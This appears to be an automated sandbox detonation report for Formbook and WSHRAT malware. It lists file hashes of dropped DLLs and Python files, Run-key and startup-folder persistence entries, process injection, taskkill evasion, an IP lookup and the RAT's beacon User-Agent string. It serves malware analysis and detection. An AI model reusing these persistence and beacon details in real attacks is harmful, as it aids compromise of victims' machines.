C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll

MD5 8d02dd4c29bd490e672d271700511371
SHA1 f3035a756e2e963764912c6b432e74615ae07011
SHA256 c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SHA512 d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll

MD5 ac290dad7cb4ca2d93516580452eda1c
SHA1 fa949453557d0049d723f9615e4f390010520eda
SHA256 c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512 b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll

MD5 ac290dad7cb4ca2d93516580452eda1c
SHA1 fa949453557d0049d723f9615e4f390010520eda
SHA256 c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512 b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll

MD5 849f2c3ebf1fcba33d16153692d5810f
SHA1 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA512 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll

MD5 849f2c3ebf1fcba33d16153692d5810f
SHA1 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA512 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll

MD5 a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1 116846ca871114b7c54148ab2d968f364da6142f
SHA256 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512 e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll

MD5 a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1 116846ca871114b7c54148ab2d968f364da6142f
SHA256 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512 e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll

MD5 8b0ba750e7b15300482ce6c961a932f0
SHA1 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256 bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512 fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll

MD5 72e28c902cd947f9a3425b19ac5a64bd
SHA1 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA512 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll

MD5 72e28c902cd947f9a3425b19ac5a64bd
SHA1 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA512 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll

MD5 fefb98394cb9ef4368da798deab00e21
SHA1 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256 b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA512 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll

MD5 fefb98394cb9ef4368da798deab00e21
SHA1 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256 b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA512 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll

MD5 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512 da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll

MD5 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512 da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll

MD5 0d1aa99ed8069ba73cfd74b0fddc7b3a
SHA1 ba1f5384072df8af5743f81fd02c98773b5ed147
SHA256 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
SHA512 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll

MD5 0d1aa99ed8069ba73cfd74b0fddc7b3a
SHA1 ba1f5384072df8af5743f81fd02c98773b5ed147
SHA256 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
SHA512 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll

MD5 e479444bdd4ae4577fd32314a68f5d28
SHA1 77edf9509a252e886d4da388bf9c9294d95498eb
SHA256 c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
SHA512 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll

MD5 e479444bdd4ae4577fd32314a68f5d28
SHA1 77edf9509a252e886d4da388bf9c9294d95498eb
SHA256 c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
SHA512 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll

MD5 babf80608fd68a09656871ec8597296c
SHA1 33952578924b0376ca4ae6a10b8d4ed749d10688
SHA256 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
SHA512 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll

MD5 babf80608fd68a09656871ec8597296c
SHA1 33952578924b0376ca4ae6a10b8d4ed749d10688
SHA256 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
SHA512 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll

MD5 e2f648ae40d234a3892e1455b4dbbe05
SHA1 d9d750e828b629cfb7b402a3442947545d8d781b
SHA256 c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
SHA512 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll

MD5 e2f648ae40d234a3892e1455b4dbbe05
SHA1 d9d750e828b629cfb7b402a3442947545d8d781b
SHA256 c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
SHA512 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d0289835d97d103bad0dd7b9637538a1
SHA1 8ceebe1e9abb0044808122557de8aab28ad14575
SHA256 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
SHA512 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d0289835d97d103bad0dd7b9637538a1
SHA1 8ceebe1e9abb0044808122557de8aab28ad14575
SHA256 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
SHA512 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll

MD5 eff11130bfe0d9c90c0026bf2fb219ae
SHA1 cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
SHA256 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
SHA512 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll

MD5 eff11130bfe0d9c90c0026bf2fb219ae
SHA1 cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
SHA256 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
SHA512 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add

\Users\Admin\AppData\Roaming\wshsdk\ucrtbase.dll

MD5 d6326267ae77655f312d2287903db4d3
SHA1 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
SHA256 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
SHA512 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll

MD5 41a348f9bedc8681fb30fa78e45edb24
SHA1 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256 c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SHA512 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__init__.py

MD5 82afd9dcb28c19afdc42097fcbdbe662
SHA1 329e052afe981c8ba32ff78df2deb9d041c05f8b
SHA256 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e
SHA512 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc

MD5 e3f691d123a890f18538f5fead7bd6cd
SHA1 f6e77a0008cefa3a7e3f67c7d11c7787391db5d9
SHA256 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934
SHA512 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\codecs.cpython-37.pyc

MD5 31a2fe679cad1b609caba7c961f43d70
SHA1 21d411d11ce126c054ea70f90196c81b18eaa550
SHA256 6b903c49e04070578aa47a378ff830bc9407be92c8b952a134cec40e944fa30d
SHA512 34dde13a6a197caf1ed9fe73ca30e70c966027c44509e398334a6e9be8eb8f5c3289ef66383f3d9cc69da26cca2097c48cb5fde7be14476fe35fd2cc087da855

C:\Users\Admin\AppData\Roaming\wshsdk\lib\codecs.py

MD5 d1d8d96ee5398cda53cbddca69b8e2ab
SHA1 3998c0a2124ab260a7d83f296228be90418b8366
SHA256 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3
SHA512 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc

MD5 96f8cc58ae6da7199951c19543193a61
SHA1 c9c75c757cb1ea2198f84d80de052db7d874b7c7
SHA256 e24b41e43dae2dcda0a88cae0dc52993ce66790d5addd498d772ea5406f6068e
SHA512 fcb0d4c5f7ceac706b764caf495afb3517e807f89e3f21534997400c1b8fcfc7b23e09bfd3a4599ab4bdf388a36f3f9cd7c14f22ae9c48e03b1d85ed7a8c58dc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\utf_8.py

MD5 f932d95afcaea5fdc12e72d25565f948
SHA1 2685d94ba1536b7870b7172c06fe72cf749b4d29
SHA256 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e
SHA512 a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc

MD5 840a56d291513211bd0e65864b9169f3
SHA1 af58891c07f864d4753baa1dfdbdd71a614cded1
SHA256 a597b04b97a8bfe577010d816ca8a1480247ea96b025c59c345b7b120bb5f922
SHA512 b1fbfbc5ca147fd0fcb9e7a509d5ec5a4578bb038a8116c908aa48ecd593694ab4d318b2bc6c8240bc6c2b4e2e23b7b6ed9d295619a862748ad3609445cd3d87

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\aliases.py

MD5 794677da57c541836ef8c0be93415219
SHA1 67956cb212acc2b5dc578cff48d1fe189e5274e4
SHA256 9ed4517a5778b2efbd76704f841738c12441ff649eed83b2ea033b3843c9b3d5
SHA512 33c3fa687ea494029ff6f250557eaaa24647f847255628b9198a8a33859db0a716d5a3c54743d58b796a46102f2a57da3445935ca0fef1245164523ff4294088

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\abc.cpython-37.pyc

MD5 cea4fa818d4468f70d14cae1c3fa9593
SHA1 cb060d183cb2f4850d2199a51e82301f653d51c4
SHA256 f64180d0a00e09801d9fa616f7fc21ffc7bb532b19209320059eb3d126e0485f
SHA512 9f434ebacc2d75483b00c4ee687ccd8df69dde06bbf1cb7bb32e7d6ca5db82130f78543a8166446a49fcd51ade6e2f983eb2469dcde0e1f6d4da595fbd01d3a2

C:\Users\Admin\AppData\Roaming\wshsdk\lib\abc.py

MD5 17e3407344267dde764ecaa542cccd4d
SHA1 ec774abd2a9aa2729a8af6a9cd67dfb22fd0acae
SHA256 f3bbcdb6406b9f9a3467ecd5a8ba74f1accb36adc95aa50d805c2927f09a2304
SHA512 850b5f7293ac61d41eb5e13791aac643858daac0950ed1271ac1f3534184f8f379c248e94e63a9abbb699ae4436e4324a96daf5465abc6a50cbe99887024e1f6

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\io.cpython-37.pyc

MD5 deddc1aebef1d56aa912f32deff5355f
SHA1 472c6923a8fae0cfb7fba6890f2c37dfaf685bcc
SHA256 c27434a09d7e90d3e7980427fa6d22d0eb570663e110b68dd9a71f8bcc3aad24
SHA512 89edddf61d0ce04650e5886f5dc98931a3ac52ecacac6e8fe78ff2b3c5db5943118b600ca05fec3d4022a6469dfeeea0979b03313fbabfc057ac5772103bd328

C:\Users\Admin\AppData\Roaming\wshsdk\lib\io.py

MD5 2c098fb1d1a4c0a183da506daa34a786
SHA1 55fb1833342ad13c35c6d3cb5fda819327773b21
SHA256 f89251a16945f7c125554cc91c7e7ed1560b366396c3153a4cadfb7a7133cd03
SHA512 375903e7bf79cf6c8e7c4decff482f4b59594aaaef62e01f1f45d0f9e26f9e864690d79cdfbdcf46cd83562cc465ef419cac32739d35bcb9fe6124682a997918

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc

MD5 2312f7d16eed297caa4a0da46f612479
SHA1 afc6f0ff4b5d57204b20c4127a58e8cdb0f1f09d
SHA256 3b033fb54ed66cfd73e6cd1479e3a7d7166d70d713d232707dd2b28ac92af2c7
SHA512 66faa5cc8ede6e929ac22ba48a6f1136a70879ccbdbe31146c1f4fb9f9d3744976e36fc47c533a3be4a6edb5b72870dc12018ac73924acf6217c17002c35815a

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\latin_1.py

MD5 92c4d5e13fe5abece119aa4d0c4be6c5
SHA1 79e464e63e3f1728efe318688fe2052811801e23
SHA256 6d5a6c46fe6675543ea3d04d9b27ccce8e04d6dfeb376691381b62d806a5d016
SHA512 c95f5344128993e9e6c2bf590ce7f2cffa9f3c384400a44c0bc3aca71d666ed182c040ec495ea3af83abbd9053c705334e5f4c3f7c07f65e7031e95fdfb7a561

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc

MD5 e155072de8b3f0f7c8a089802f2f42fd
SHA1 416497f00986510600ae40c2b263d36c9d4e76c9
SHA256 e2ec095476cd398acf0f5f3e324f29e4e0756c3cb381c90a048ad87e1fef086d
SHA512 f0ffc043da6ec8e49b5d7fdd01685d9cac95d6cc41a69b924a89dbc6b0a11687a67d0ac150f9669ebc5df08942c5b6a79eb9df827d13823995e21620eb01f316

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\ascii.py

MD5 ff48c6334861799d8d554f5d2a30ba00
SHA1 08520b19d0353712cdfd919b3694945678c3d2d7
SHA256 698c578b9b5df7bd6f8b2761d114f74cff854c1396083c8ab912b11fcae83b86
SHA512 087a0e1ba9d9ca2c2f51f0156ad0ada1d1eb7ccba8b46159b95779b053d2431fc52ba1ca57fec381ea044a7f0e41490b5389b1af2dbf513c35cc1b29997fee6e

C:\Users\Admin\AppData\Roaming\CMDCEX~1.ZIP

MD5 a8e496443115a63697cb350f47ae1729
SHA1 a69779b57ecc8457e85066e7a5ab742c70ea653d
SHA256 6f3cf374a1aa961be87dde5aaeb1706d95cdcadbd1a4c961363e5ff33fab168d
SHA512 0c3c5504567912cfd8cf40664463cdc518ce6810bfd05af91ffee30b13f4e115a93f6faae8e5c8aa88ee91e2c3b4404126dbdfcffb82aa2625199e432a3cea9c

C:\Users\Admin\AppData\Roaming\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-08 10:48

Reported

2023-08-08 10:51

Platform

win10v2004-20230703-en

Max time kernel

59s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\System32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4212 set thread context of 2716 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 3384 set thread context of 2716 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
